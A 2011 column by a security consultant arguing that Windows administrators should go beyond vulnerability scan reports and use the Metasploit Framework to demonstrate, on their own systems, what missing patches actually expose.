Anybody can run a vulnerability scanner, generate a report and claim to have found everything that matters on their Windows desktops. In fact, that very scenario takes place in the name of "compliance" every day. But what's the real value in relying solely on vulnerability scanners to tell which vulnerabilities may -- or may not -- be present in your Windows environment?
Don't get me wrong. We couldn't live without vulnerability scanners. There's a problem, however, with vulnerability testing today in that scans are run, systems are found to be "at risk," and then IT moves on to something else. In the end, Windows desktop systems are often not properly patched or hardened from the elements, so they remain on the network as a target waiting to be exploited.
Windows security is all in how an organization approaches vulnerability testing and management. You can choose to go the traditional route and reach a security plateau, or you can take Windows vulnerability testing a few steps further and actually demonstrate, on your systems in your environment, what the vulnerabilities actually mean to your business. I can't think of a better way to do this than using the free and easy-to-use tool called Metasploit Framework.
Metasploit Framework is a unique open source tool that allows you to actually exploit the vulnerabilities you find when performing vulnerability scans (via scanners such as eEye Retina, QualysGuard and even Microsoft Baseline Security Analyzer). There are commercial alternatives to Metasploit Framework, including Core Impact, Immunity Canvas and even commercial versions of Metasploit sold by Rapid7. Everyone's needs are different, but I've found that if you need proof of how Windows desktop vulnerabilities are affecting your network, then all you need is the free version.
Metasploit has both a graphical user interface (GUI) and a command-line console. Administrators can use either to run exploit code and inject payloads to do things such as obtain remote Windows command prompts, add backdoor user accounts, crack passwords, run executables and so on -- all things that can make desktop vulnerability testing much more valuable.
I've been surprised that so many people I've met in IT and information security have never heard of Metasploit or have never actually used it. That's like not using a network analyzer, an IP subnet calculator or the Sysinternals tool set -- how can you effectively manage and secure Windows desktops without these tools?
If you've never heard of Metasploit Framework or don't quite understand its potential value, take it for a spin. If you've heard of it but have been afraid to try it out, you really should. Metasploit is a security assessment tool that should be used even in the most basic security assessments. You'll likely use it the most in your internal desktop and server security assessments from the perspective of a trusted insider.
Keep in mind that someone armed with a basic vulnerability scanner and Metasploit doesn't even need a Windows login to find and exploit these Windows vulnerabilities. That's both the danger inherent in Windows desktops and the beauty of using such a tool to prove where things stand.
With Metasploit Framework, you no longer have to provide generic statements in your reports like, "There are missing patches," or, "Someone could exploit this vulnerability to run arbitrary code." Instead, by carving out 15 minutes of your vulnerability assessment projects, you can obtain tangible evidence showing what these Windows desktop security flaws really mean to the enterprise.
Just recently, I demonstrated to a client how simple it is for someone to exploit a missing patch vulnerability on a Windows server using Metasploit Framework. It took just minutes to show him, and the look on his face made it worth every second.
Stop documenting hypothetical Windows desktop vulnerability scenarios. Prove them using Metasploit Framework instead. It's one of the best ways to get people's attention for and acceptance of information security measures.
ABOUT THE AUTHOR:
Kevin Beaver is an information security consultant, expert witness and professional speaker at Atlanta-based Principle Logic LLC. With over 22 years of experience in the industry, Beaver specializes in performing independent security assessments revolving around information risk management. He has authored/co-authored 10 books on information security, including The Practical Guide to HIPAA Privacy and Security Compliance and Hacking For Dummies. In addition, Beaver is the creator of the Security On Wheels information security audio books and blog providing security learning for IT professionals on the go. He can be reached at www.principlelogic.com, and you can follow him on Twitter at @kevinbeaver.
This was first published in July 2011